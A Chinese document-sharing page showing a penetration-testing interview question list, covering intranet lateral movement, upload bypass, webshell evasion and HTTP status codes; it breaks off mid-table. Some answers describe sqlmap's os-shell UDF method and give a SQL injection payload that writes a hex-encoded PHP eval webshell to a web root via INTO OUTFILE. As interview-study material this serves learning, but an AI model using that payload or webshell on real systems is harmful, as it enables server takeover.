网站大量收购独家精品文档,联系QQ:2885784924

暗泉信息等企业面试题.docx

  1. 1、本文档共13页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多

暗泉信息等企业面试题

1.内网怎么去找到域管理员的机器

2.内网中除了哈希传递攻击还有什么方式免密登陆到其他的机器3.内网工作组环境和内网环境攻击

4.文件上传漏洞对文件上传类型做了限制,除了抓包修改你还有什么思路去绕过,绕过时你一般修改哪些字段,除了content‐type

5.任意文件下载漏洞,你怎么判断当前用户是不是管理员

6.Windows环境下任意文件下载漏洞如何通过该漏洞获取登陆到该主机7.上传webshell你会做免杀吗,怎么做免杀

8.mysql中的os‐getshell命令是怎么实现getshell的

普通注入

普通注入‐‐os‐shell主要是通过上传一个sqlmap的马,然后通过马来进行命令执行1.使用该命令的前提:

数据库支持外连

Secure_file_priv参数为空或者为指定路径。对mysql目录存在写入权限。

针对版本大于5.1,需要存在/lib/plugin目录2.攻击过程:

利用Sqlmap进行数据库连接:sqlmap‐dURL

安装pymysql后再次进行连接,连接后会显示数据库大概的版本

执行sqlmap‐d‐‐os‐shell3.攻击过程sqlmap做的工作:

连接Mysql数据库并且获取数据库版本。检测是否为数据库dba。

检测sys_exec和sys_eval2个函数是否已经被创建了。上传dll文件到对应目录。

用户退出时默认删除创建的sys_exec和sys_eval2个函数

9.如果你的电脑被入侵了,你怎么去找到对方是谁10.常见web漏洞产生的原因、危害和防御措施

11.sql注入可以getshell吗,如何getshell

条件

条件1:网站的绝对路径

条件2:gpc是关闭的

附:

如果magic_quotes_gpc=On,PHP解析器就会自动为post、get、cookie过来的

数据增加转义字符“\”,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符(认为是php的字符)引起的污染

条件3:root用户权限

条件4:secure_file_priv不为NULL

使用intooutfile写入一句话木马,构造payload:

1

12%20union%20select%201,2,3,4,5,6,0x3c3f706870206576616c28245f504f53545b2774657374275d293f3e%20into%20outfile%20%27D:/phpStudy/PHPTutorial/WWW/eval2.php%27

其中0x3c3f706870206576616c28245f504f53545b2774657374275d293f3e是hex编码后的?phpeval($_POST[test])?

12.sql注入不能使用and和or,你如何开始你的注入13.收集资产的思路

14.你平时用了哪些工具

15.DDos攻击及其缓解方式

16.CDN怎么绕过,思路有哪些,国外网站访问,Nslookup,SSL证书,查看DNS解析记录,Nslookup怎么来用?

17.TCP三次握手过程简述

18.![]![]![]![]...产生原因是什么,怎么办

19.Windows有哪些敏感文件,保存用户账号密码的文件是什么

20.常见端口号及其漏洞21.nmap扫描端口的原理22.二进制免杀机制

23.struts2漏洞原理,以s45和s46举例

24.你利用哪些解析漏洞来配合拿shell,Nginx解析漏洞如何?25.Java的重载和重放有什么区别

26.了解Java的反射机制吗

27.Mysql里面你通过看哪个表来查看其他的表

28.XSS攻击时你无法获取用户cookie,此时你怎么攻击29.一个打满补丁的机器,你如进行提权

30.你上传了一个webshell但是你发现自己用常见的webshell连接工具连不上,此时你怎么办31.常见的http数据包协议类型

32.404,403,302,301,等数据包返回标识的含义

状态码状态码英文名称中文描述

状态码状态码英文名称中文描述

100Continue继续。客户端应继续其请求

101SwitchingProtocols切换协议。服务器根据客户端的请求切换协议。只能切换到更高级的协议,例如,切换到HTTP的新版本协议

200OK请求成功。一般用于GET与POST请求

201Created已创建。成功请求并创建了新的资源

202Accepted已接受。已经接受请求,但未处理完成

203Non‐

文档评论(0)

Jane9872 + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档